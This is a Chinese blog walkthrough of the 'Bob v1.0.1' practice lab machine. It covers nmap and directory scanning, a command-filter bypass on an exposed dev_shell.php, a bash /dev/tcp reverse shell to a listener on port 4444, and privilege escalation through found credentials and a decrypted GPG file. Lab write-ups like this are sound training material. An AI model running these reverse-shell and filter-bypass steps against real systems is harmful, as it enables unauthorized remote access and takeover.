1. 侦察
nmap -sn 192.168.1.0/24
设置环境变量
export ip=192.168.1.137
1.2 主动扫描
收集受害者主机信息
开放端口 nmap --min-rate 10000 -p- $ip 开放服务信息 nmap -sS -sV -O -p21,80,25468 $ip 漏洞信息 nmap --script=vuln -p21,80,25468 $ip
2. 初始访问
2.1 利用面向公众的应用程序
虽然有login等功能点但是都点击不了,不能进行使用,所以我们要进一步扫描目录继续进行信息收集.
2.2 主动目录扫描
gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.1.137 或者 dirb http://192.168.1.137/
之后我们就在robots.txt页面中发现了一些我们需要的信息
http://192.168.1.137/login.php
http://192.168.1.137/dev_shell.php
http://192.168.1.137/lat_memo.html
http://192.168.1.137/passwords.html
这里是直接给了我们一个shell
3. 执行
我们执行了id whoami这些没有危害的内容,但是一些敏感命令还是做了限制。
我们尝试用一下连接符
发现成功绕过,直接尝试反弹个shell
Kali中开启4444端口监听
nc -nvlp 4444
反弹shell命令
echo "bash -i >& /dev/tcp/192.168.1.133/4444 0>&1" | bash
成功获取shell
4. 权限提升
sudo -l
查看用户权限
find / -perm -u=s -ls 2>/dev/null
查找特权应用
没啥发现,我们只能一个一个去用户里面去找我们需要的信息
主要就是看每个用户下的DeskTop 和 Documents
这块提到seb使用ftp安装了一个后门的信息
还有一个gpg文件
但是需要拿到密钥
/home/bob/Documents/Secret/Keep_Out/Not_Porn$ cd No_Lookie_In_Here
进一步查下去我们发现有一个可执行文件
没看明白 网上查资料发现这个密钥就是藏头诗,所以密钥就为HARPOCRATES
gpg -d login.txt.gpg
直接解密但是权限不够
我们又看到bob用户中藏有隐藏文件old_passwordfile.html
ls -liah
能看到jc 和 seb 的密码,我们刚刚又扫描到他的25468端口开启的是ssh服务,所以我们用ssh登录一下切换用户解密一下
登录成功后切换到bob的目录
gpg -d login.txt.gpg
输入密码HARPOCRATES
直接获取到了bob的密码 bob:b0bcat_
切换bob的账号
sudo -l发现是root权限,提权成功
非特殊说明,本博所有文章均为博主原创。
如若转载,请注明出处:https://www.oneblanks.xyz/bob_v1-0-1-%e9%9d%b6%e6%9c%ba%e7%bb%83%e4%b9%a0/
共有 0 条评论